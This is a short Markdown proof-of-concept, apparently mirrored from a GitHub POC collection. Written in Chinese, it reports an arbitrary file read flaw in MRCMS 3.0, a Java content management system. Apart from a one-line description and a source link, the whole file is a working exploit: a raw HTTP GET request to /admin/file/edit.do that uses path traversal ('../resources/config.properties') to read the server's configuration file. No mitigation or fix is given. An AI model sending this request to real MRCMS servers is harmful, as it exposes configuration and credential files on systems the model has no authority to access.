mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-30 06:24:42 +00:00
26 lines
812 B
Markdown
26 lines
812 B
Markdown
## MRCMS3.0任意文件读取漏洞
|
||
|
||
MRCMS 是一款Java开发的内容管理系统,采用数据模型+模板+插件实现,内置提供了文章模型发布功能。
|
||
|
||
## 源码
|
||
```
|
||
https://gitee.com/marker/MRCMS
|
||
```
|
||
|
||
## poc
|
||
```
|
||
GET /admin/file/edit.do?path=../resources/config.properties&name= HTTP/1.1
|
||
Host: 127.0.0.1:8080
|
||
Referer: http://127.0.0.1:8080/admin/index.do
|
||
Sec-Fetch-Dest: empty
|
||
Sec-Fetch-Site: same-origin
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
|
||
Accept: text/html, */*; q=0.01
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Accept-Encoding: gzip, deflate, br
|
||
Sec-Fetch-Mode: cors
|
||
X-Requested-With: XMLHttpRequest
|
||
```
|
||
|
||
|